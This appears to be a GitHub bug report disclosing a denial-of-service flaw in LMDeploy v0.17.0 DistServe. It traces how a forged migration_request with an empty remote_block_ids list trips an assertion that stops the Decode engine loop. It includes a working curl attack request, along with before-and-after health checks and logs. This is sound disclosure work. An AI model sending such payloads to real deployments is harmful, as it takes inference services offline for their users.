Skip to content

[Bug] Untrusted migration_request can terminate the DistServe Decode EngineLoop and cause persistent denial of service #4965

Description

@JPengLi

Checklist

  • 1. I have searched related issues but cannot get the expected help.
  • 2. The bug has not been fixed in the latest version.
  • 3. Please note that if the bug-related issue you submitted lacks corresponding environment info and a minimal reproducible demo, it will be challenging for us to reproduce and resolve the issue, reducing the likelihood of receiving feedback.

Describe the bug

LMDeploy DistServe's Decode OpenAI-compatible API accepts a migration_request field from the external request body and forwards it into the internal P/D migration path. An attacker who can send the API request to the Decode node's own /v1/completions or /v1/chat/completions endpoint can submit a syntactically valid but semantically invalid migration_request, triggering an uncaught exception in the Decode migration loop.

The exception is not isolated to the offending request. The Decode EngineLoop waits on its long-running tasks with asyncio.FIRST_EXCEPTION; when the migration task fails, the remaining pending tasks are cancelled and the whole Decode engine loop exits. In my test, one malicious request made Decode /health become unhealthy. Subsequent normal Decode requests returned 503, and normal Proxy-routed requests also returned an LMDeploy 503 error object. Recovery required restarting the affected engine/container.

Detail

Analyzed and tested version:

  • Runtime version: LMDeploy v0.17.0

The root-cause chain is as follows.

First, both completion and chat completion OpenAI-compatible entry points read migration_request directly from the external JSON request body:

  • lmdeploy/serve/openai/endpoints/completions.py:130-135
  • lmdeploy/serve/openai/chat_completions/serving.py:180-185

Relevant code:

migration_request = json_request.pop('migration_request', None)
with_cache = json_request.pop('with_cache', False)
preserve_cache = json_request.pop('preserve_cache', False)
if migration_request:
    migration_request = MigrationRequest.model_validate(migration_request)

This only performs Pydantic shape validation. It does not verify that the field was generated by a trusted Proxy, nor does it validate the semantic consistency of the migration data.

MigrationRequest is defined in lmdeploy/pytorch/disagg/conn/protocol.py:93-101:

class MigrationRequest(BaseModel):
    protocol: MigrationProtocol
    remote_engine_id: str
    remote_session_id: int
    remote_token_id: int
    remote_block_ids: list[int]
    is_dummy_prefill: bool = False

The public API path does not validate, for example:

  • whether remote_engine_id is a trusted and connected peer;
  • whether protocol matches the currently enabled migration backend;
  • whether the remote cache-pool/session/block metadata exists;
  • whether remote_block_ids matches the block table actually allocated on the Decode side.

When a request contains migration_request, the sequence is placed into MIGRATION_WAITING instead of the normal WAITING state. This happens in lmdeploy/pytorch/messages.py:300-328:

status = MessageStatus.WAITING if migration_request is None else MessageStatus.MIGRATION_WAITING
seq.set_state(build_seq_state(self.scheduler, seq, status))

The Decode migration loop then consumes these externally supplied fields. The relevant code is in lmdeploy/pytorch/engine/engine_loop.py:585-611:

prefill_block_ids = migration_request.remote_block_ids
decode_block_ids = list(self.scheduler.block_manager.get_block_table(msg=msg))

assert len(prefill_block_ids) == len(decode_block_ids), (
    f'#prefill block ids ({len(prefill_block_ids)}) must equal to '
    f'#decode block ids ({len(decode_block_ids)})'
    f'all id length: {msg.num_token_ids}')

migration_inputs = MigrationExecutionBatch(
    protocol=migration_request.protocol,
    requests=migration_execution_requests)
await self.executor.migrate(migration_inputs)

The bare assert is directly influenced by the request-controlled remote_block_ids. If a request provides an empty remote_block_ids list while the Decode scheduler allocates a local block for the request, the assertion fails with AssertionError. This failure happens before the real migration backend call (await self.executor.migrate(...)), so it does not depend on successful KV transfer.

The impact is broader than the current request. EngineLoop starts several long-running tasks, including MainLoopMigration:

  • lmdeploy/pytorch/engine/engine_loop.py:662-677

EngineLoop.wait_tasks() then waits on them via wait_for_async_tasks():

  • lmdeploy/pytorch/engine/engine_loop.py:682-701
  • lmdeploy/pytorch/utils.py:186-213

wait_for_async_tasks() uses asyncio.FIRST_EXCEPTION:

done, pending = await asyncio.wait(tasks, return_when=asyncio.FIRST_EXCEPTION)

if cancel_pending:
    for task in pending:
        task.cancel()

for task in done:
    if exc := task.exception():
        raise exc from None

Therefore, one exception inside MainLoopMigration cancels the other long-running EngineLoop tasks and is re-raised. The logs show EngineLoop wait_tasks failed followed by Engine main loop failed. After that, the request manager detects that the main loop is no longer alive, and later requests become ResponseType.ENGINE_STOP_ERROR.

The health check reflects this state. In lmdeploy/pytorch/engine/engine.py:738-746, if the request loop is no longer alive, the engine returns:

return dict(
    alive=False,
    message='PyTorch engine request loop is not alive.',
    schedule_metrics=None)

Reproduction

Test environment:

  • Target version: LMDeploy v0.17.0
  • Model: Qwen2.5-0.5B-Instruct
  • Deployment mode: DistServe 1P1D, three containers: Proxy / Prefill / Decode
  • Proxy URL: http://127.0.0.1:19000
  • Prefill URL: http://127.0.0.1:19001
  • Decode URL: http://127.0.0.1:19002
  • Relevant configuration:
    • LMDEPLOY_MIGRATION_PROTOCOL=NVLINK
    • LMDEPLOY_MIGRATION_BACKEND=DLSlime
    • LMDEPLOY_SESSION_LEN=2048
    • LMDEPLOY_MAX_BATCH_SIZE=4
    • LMDEPLOY_CACHE_MAX_ENTRY_COUNT=0.30

The lab used LMDEPLOY_AUDIT_NOOP_MIGRATION=1 because this host could not complete reliable CUDA P2P/RDMA data transfer. This does not change the LC2 trigger mechanism: the demonstrated failure is the block-count assertion in engine_loop.py, and it occurs before the real backend migration call (await self.executor.migrate(...)).

1. Confirm Decode works before the attack

Send a normal Decode request:

curl --noproxy '*' --silent --show-error \
  --output baseline_decode_response.json \
  --write-out 'baseline_decode_http=%{http_code} baseline_decode_time=%{time_total}\n' \
  -X POST 'http://127.0.0.1:19002/v1/completions' \
  -H 'Content-Type: application/json' \
  -d '{
    "model": "Qwen2.5-0.5B-Instruct",
    "prompt": "LC2 baseline direct decode request",
    "temperature": 0,
    "max_tokens": 1,
    "stream": false
  }'

Observed result:

baseline_decode_http=200 baseline_decode_time=0.079193

2. Confirm the normal Proxy path works before the attack

Send a normal Proxy request:

curl --noproxy '*' --silent --show-error \
  --output warm_proxy_response.json \
  --write-out 'warm_proxy_http=%{http_code} warm_proxy_time=%{time_total}\n' \
  -X POST 'http://127.0.0.1:19000/v1/completions' \
  -H 'Content-Type: application/json' \
  -d '{
    "model": "Qwen2.5-0.5B-Instruct",
    "prompt": "LC2 warm full proxy path. The capital of France is",
    "temperature": 0,
    "max_tokens": 2,
    "stream": false
  }'

Observed result:

warm_proxy_http=200 warm_proxy_time=0.141891

3. Send a syntactically valid but semantically invalid migration_request to Decode

Attack request:

curl --noproxy '*' --silent --show-error \
  --output attack_decode_response.json \
  --write-out 'attack_decode_http=%{http_code} attack_decode_time=%{time_total}\n' \
  -X POST 'http://127.0.0.1:19002/v1/completions' \
  -H 'Content-Type: application/json' \
  -d '{
    "model": "Qwen2.5-0.5B-Instruct",
    "prompt": "LC2 forged migration_request full decode API path",
    "temperature": 0,
    "max_tokens": 1,
    "stream": false,
    "migration_request": {
      "protocol": 3,
      "remote_engine_id": "http://127.0.0.1:19001",
      "remote_session_id": 123456789,
      "remote_token_id": 1,
      "remote_block_ids": [],
      "is_dummy_prefill": false
    }
  }'

In the v0.17.0 JSON/Enum representation, protocol=3 corresponds to NVLINK. The key point is that remote_block_ids is an empty list, while the Decode side allocates at least one local block for this request. This deterministically triggers the block-count assertion.

Observed result:

attack_decode_http=503 attack_decode_time=1.011092

Attack response body:

{"message":"The inference engine is unavailable.","type":"server_error","code":503,"param":null,"object":"error"}

4. Check Decode health after the attack

curl --noproxy '*' --silent --show-error \
  'http://127.0.0.1:19002/health'

Observed response:

{"status":"unhealthy","message":"PyTorch engine request loop is not alive."}

5. Send another normal Decode request after the attack

curl --noproxy '*' --silent --show-error \
  --output post_decode_normal_response.json \
  --write-out 'post_decode_normal_http=%{http_code} post_decode_normal_time=%{time_total}\n' \
  -X POST 'http://127.0.0.1:19002/v1/completions' \
  -H 'Content-Type: application/json' \
  -d '{
    "model": "Qwen2.5-0.5B-Instruct",
    "prompt": "LC2 baseline direct decode request",
    "temperature": 0,
    "max_tokens": 1,
    "stream": false
  }'

Observed result:

post_decode_normal_http=503 post_decode_normal_time=1.010515

The response body remained:

{"message":"The inference engine is unavailable.","type":"server_error","code":503,"param":null,"object":"error"}

6. Send another normal Proxy request after the attack

curl --noproxy '*' --silent --show-error \
  --output post_proxy_response.json \
  --write-out 'post_proxy_http=%{http_code} post_proxy_time=%{time_total}\n' \
  -X POST 'http://127.0.0.1:19000/v1/completions' \
  -H 'Content-Type: application/json' \
  -d '{
    "model": "Qwen2.5-0.5B-Instruct",
    "prompt": "LC2 warm full proxy path. The capital of France is",
    "temperature": 0,
    "max_tokens": 2,
    "stream": false
  }'

Observed result:

post_proxy_http=200 post_proxy_time=1.073680

Although the transport-level HTTP status was 200, the response body was the same LMDeploy 503 error object:

{"message":"The inference engine is unavailable.","type":"server_error","code":503,"param":null,"object":"error"}

This shows that the Decode engine loop was broken and that normal Proxy-routed traffic to this Decode node was no longer usable.

7. Relevant Decode log excerpt

The Decode logs contained the following failure chain:

EngineLoop wait_tasks failed.
Engine main loop failed.
AssertionError: #prefill block ids (0) must equal to #decode block ids (1)all id length: 9
ResponseType.ENGINE_STOP_ERROR

The counted log events were:

decode_engine_loop_failed=1
decode_engine_main_failed=1
decode_engine_stop_error=3
decode_assertion_error=1

Summary of observed results:

baseline_decode_http=200 baseline_decode_time=0.079193
warm_proxy_http=200 warm_proxy_time=0.141891
attack_decode_http=503 attack_decode_time=1.011092
post_decode_normal_http=503 post_decode_normal_time=1.010515
post_proxy_http=200 post_proxy_time=1.073680
decode_health_after_attack={"status":"unhealthy","message":"PyTorch engine request loop is not alive."}

Impact

This issue can cause persistent denial of service.

An attacker only needs to send one syntactically valid JSON request to the Decode node's OpenAI API. The malformed migration_request triggers an exception in the Decode migration loop. Because the exception propagates through FIRST_EXCEPTION handling to the whole EngineLoop task group, the impact is not limited to the malicious request. The Decode request loop stops serving subsequent requests.

Observed impact:

  • before the attack, a normal direct Decode request returned HTTP 200;
  • before the attack, a normal Proxy full-path request returned HTTP 200;
  • after one malicious migration_request, Decode /health returned unhealthy;
  • after the attack, a normal direct Decode request returned HTTP 503;
  • after the attack, a normal Proxy request returned an LMDeploy 503 error object;
  • logs showed EngineLoop wait_tasks failed, Engine main loop failed, AssertionError, and multiple ResponseType.ENGINE_STOP_ERROR events.

Environment

Target version: LMDeploy v0.17.0
Model: Qwen2.5-0.5B-Instruct
Python: 3.12.3 (main, Jul 15 2026, 23:46:41) [GCC 13.3.0]
CUDA available: True
GPU 0: NVIDIA A100 80GB PCIe
GPU 0 Compute Capability: 8.0
CUDA_HOME: /usr/local/cuda
NVCC: Cuda compilation tools, release 13.0, V13.0.88
CUDA Driver Version: 590.48.01
PyTorch: 2.13.0+cu130
sglang: 0.5.19
sglang-kernel: 0.4.6.post1
flashinfer_python: 0.6.18
flashinfer_cubin: 0.6.18
flashinfer_jit_cache: 0.6.18+cu130
triton: 3.7.1
transformers: 5.12.1
numpy: 2.3.5
aiohttp: 3.14.3
fastapi: 0.141.1
huggingface_hub: 1.30.0
interegular: 0.3.3
modelscope: 1.39.1
orjson: 3.12.0
outlines: 0.1.11
packaging: 26.3
psutil: 7.2.2
pydantic: 2.13.5
python-multipart: 0.0.32
pyzmq: 27.2.0
uvicorn: 0.52.4
uvloop: 0.22.1
xgrammar: 0.2.1
openai: 2.6.1
tiktoken: 0.14.0
torchcodec: 0.15.0+cu130
ulimit soft: 1024

Error traceback

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

Labels

No labels
No labels

Type

No type

Projects

No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions